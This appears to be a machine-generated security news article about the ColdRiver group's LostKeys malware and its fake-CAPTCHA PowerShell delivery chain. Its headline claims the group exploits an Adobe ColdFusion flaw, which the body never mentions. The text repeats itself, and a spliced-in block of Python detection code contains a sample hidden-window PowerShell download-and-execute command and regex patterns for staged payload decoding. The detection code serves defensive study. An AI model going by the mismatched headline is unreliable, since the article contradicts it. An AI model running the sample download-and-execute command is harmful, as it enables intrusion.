Ethical Hacking News

Russia-Linked ColdRiver APT Group Exploits Adobe ColdFusion Flaw to Steal Files and Gather System Information



The Russia-linked ColdRiver APT group has been using the LostKeys malware in recent attacks on Western governments and organizations. The malware is designed to steal files from a hard-coded list of extensions and directories, and to send system information and a list of running processes to the attacker. According to Google's Threat Intelligence Group, the ColdRiver APT group has used LostKeys malware in selective ClickFix attacks since January 2025.

  • The Russia-linked ColdRiver APT group has been using LostKeys malware in their attacks on Western governments and organizations.
  • The LostKeys malware is designed to steal files and to send system information and a list of running processes to the attacker.
  • The malware uses a multi-step chain starting with a fake CAPTCHA that tricks users into running malicious PowerShell scripts.
  • The ColdRiver APT group has used ClickFix attacks since January 2025 to trick victims into running malicious scripts.
  • The malware collects system information and running processes, and its staged delivery chain uses a unique identifier for each request.
  • Experts warn that the use of LostKeys malware by the ColdRiver APT group highlights the growing threat of advanced persistent threats (APTs) in the modern cybersecurity landscape.


    The world of cyber espionage has witnessed numerous high-profile attacks in recent times, but a recent case stands out for its sophistication and cunning. The Russia-linked ColdRiver APT group, also known as "Seaborgium," "Callisto," "Star Blizzard," or "TA446," has been making headlines with its latest campaign using the LostKeys malware.



    The ColdRiver APT group has been active since at least 2015, targeting government officials, military personnel, journalists, and think tanks. Their primary objective is to gather intelligence for Russian interests, although they have been known to engage in occasional hack-and-leak operations.



    Recently, Google's Threat Intelligence Group discovered a new malware called LostKeys, which has been used by the ColdRiver APT group in their attacks on Western governments and organizations. The LostKeys malware is designed to steal files from a hard-coded list of extensions and directories, and to send system information and a list of running processes to the attacker.



    The malware uses a multi-step chain starting with a fake CAPTCHA that tricks users into running malicious PowerShell scripts. These scripts then fetch staged payloads from remote servers and execute them on the victim's device.



    According to Google's Threat Intelligence Group (GTIG), the ColdRiver APT group has used LostKeys malware in selective ClickFix attacks since January 2025. These attacks involve tricking victims into running malicious PowerShell scripts that lead to data theft via VBS payloads.



    The malware is deployed via a multi-step chain starting with a fake CAPTCHA that tricks users into running PowerShell. This "ClickFix" method, used by the ColdRiver APT group and others, fetches staged payloads from remote servers.



    The second stage computes an MD5 hash of the device's display resolution and compares it against specific hard-coded values. If the hash matches one of them, execution stops; otherwise, the malicious code retrieves the third stage, using a unique identifier for each request.



    The third stage decodes a Base64 blob to PowerShell, which retrieves and decodes the final payload. It pulls two files: a VBS decoder and a second encoded file, using unique keys for each infection chain.
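    A defender-side illustration of the staged chain described above, added here as example code that is not part of the article or of the GTIG report: it scans constructed, script-block-style PowerShell log lines (the field layout, host names and sample commands are assumptions) for the stages the article names and flags hosts on which more than one stage was observed.

```python
import re
from collections import defaultdict

# Constructed script-block-style log lines (hypothetical, not from the GTIG report).
# Shape: ts=<time> host=<name> user=<name> parent=<process> cmd=<command text>
SAMPLE_LOGS = [
    'ts=2025-05-08T10:01:02 host=WS-17 user=jdoe parent=explorer.exe cmd=powershell -w hidden -ep bypass -c "iex (iwr https://example.invalid/s2)"',
    'ts=2025-05-08T10:01:05 host=WS-17 user=jdoe parent=powershell.exe cmd=$h=[BitConverter]::ToString([Security.Cryptography.MD5]::Create().ComputeHash([Text.Encoding]::UTF8.GetBytes((Get-CimInstance Win32_VideoController).VideoModeDescription)))',
    'ts=2025-05-08T10:01:09 host=WS-17 user=jdoe parent=powershell.exe cmd=iex ([Text.Encoding]::UTF8.GetString([Convert]::FromBase64String($blob)))',
    'ts=2025-05-08T10:01:12 host=WS-17 user=jdoe parent=powershell.exe cmd=wscript.exe C:\\Users\\jdoe\\AppData\\Local\\Temp\\dec.vbs',
    'ts=2025-05-08T11:30:00 host=WS-22 user=admin parent=cmd.exe cmd=powershell -c "Get-Service | Where-Object Status -eq Running"',
]

# One pattern per stage of the chain the article describes. Any single hit is
# weak evidence on its own; the correlation below wants several stages per host.
STAGE_PATTERNS = {
    "clickfix_launch": re.compile(r"(?i)-w(indowstyle)?\s+hidden.*\b(iex|iwr|Invoke-WebRequest|DownloadString)\b"),
    "resolution_hash_check": re.compile(r"(?i)\bMD5\b.*(VideoController|VideoModeDescription|PrimaryScreen|ScreenResolution)"),
    "base64_stage_decode": re.compile(r"(?i)^(?=.*\b(iex|Invoke-Expression)\b)(?=.*FromBase64String)"),
    "vbs_execution": re.compile(r"(?i)\b[wc]script(\.exe)?\b.*\.vbs\b"),
}


def parse_line(line):
    """Split one log line into its fields; the cmd field may itself contain '='."""
    head, sep, cmd = line.partition(" cmd=")
    if not sep:
        return None
    fields = dict(kv.split("=", 1) for kv in head.split())
    fields["cmd"] = cmd
    return fields


def classify(cmd):
    """Return the set of stage tags whose pattern matches this command text."""
    return {stage for stage, pat in STAGE_PATTERNS.items() if pat.search(cmd)}


def correlate(lines):
    """Accumulate the distinct stages observed per host across all lines."""
    per_host = defaultdict(set)
    for line in lines:
        rec = parse_line(line)
        if rec is not None:
            per_host[rec["host"]] |= classify(rec["cmd"])
    return per_host


def suspicious_hosts(lines, min_stages=2):
    """Hosts on which at least min_stages distinct stages of the chain were seen."""
    return {h: sorted(s) for h, s in correlate(lines).items() if len(s) >= min_stages}
```

    Raising min_stages trades missed early detections for fewer false positives; the administrative command on WS-22 matches no stage and is never flagged.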



    "The end result of this is a VBS that we call LOSTKEYS. It is a piece of malware that is capable of stealing files from a hard-coded list of extensions and directories, along with sending system information and running processes to the attacker," the report states.



    Google experts found two additional samples dating back to December 2023. These Portable Executable (PE) files, pretending to be Maltego software, execute LOSTKEYS but follow a different execution chain.



    "It is currently unclear if these samples from December 2023 are related to COLDRIVER, or if the malware was repurposed from a different developer or operation into the activity seen starting in January 2025," concludes the report.



    The ColdRiver APT group primarily targets NATO countries but has also been known to target the Baltic, Nordic, and Eastern European regions, including Ukraine. Their main goal is to gather intelligence for Russian interests, with occasional hack-and-leak operations.



    In recent attacks, victims have included Western advisors, journalists, and Ukraine-linked individuals. The group's methods are highly sophisticated, using a combination of phishing, credential theft, and malware to achieve their objectives.



    Experts warn that the use of LostKeys malware by the ColdRiver APT group highlights the growing threat of advanced persistent threats (APTs) in the modern cybersecurity landscape. As attackers continue to evolve and adapt their tactics, it is essential for organizations to stay vigilant and take proactive measures to protect themselves against such threats.



    In conclusion, the recent exploits using LostKeys malware by the Russia-linked ColdRiver APT group serve as a reminder of the importance of staying informed about emerging threats and taking steps to mitigate them. By understanding the tactics, techniques, and procedures (TTPs) used by APT groups like ColdRiver, organizations can better prepare themselves for potential attacks.





    Related Information:
  • https://www.ethicalhackingnews.com/articles/Russia-Linked-ColdRiver-APT-Group-Exploits-Adobe-ColdFusion-Flaw-to-Steal-Files-and-Gather-System-Information-ehn.shtml

  • https://securityaffairs.com/177638/apt/russia-linked-coldriver-used-lostkeys-malware-in-recent-attacks.html

  • https://cybersecsentinel.com/lostkeys-malware-campaign-traced-to-cold-river-threat-group/

  • https://www.reuters.com/technology/cybersecurity/google-identifies-new-malware-linked-russia-based-hacking-group-2025-05-07/

  • https://www.microsoft.com/en-us/security/blog/2022/08/15/disrupting-seaborgiums-ongoing-phishing-operations/

  • https://industrialcyber.co/threat-landscape/seaborgium-apt-group-targets-defense-ngos-think-tanks-higher-education-in-nato-countries-especially-in-us-uk/


    Published: Fri May 9 10:12:09 2025 by llama3.2 3B Q4_K_M
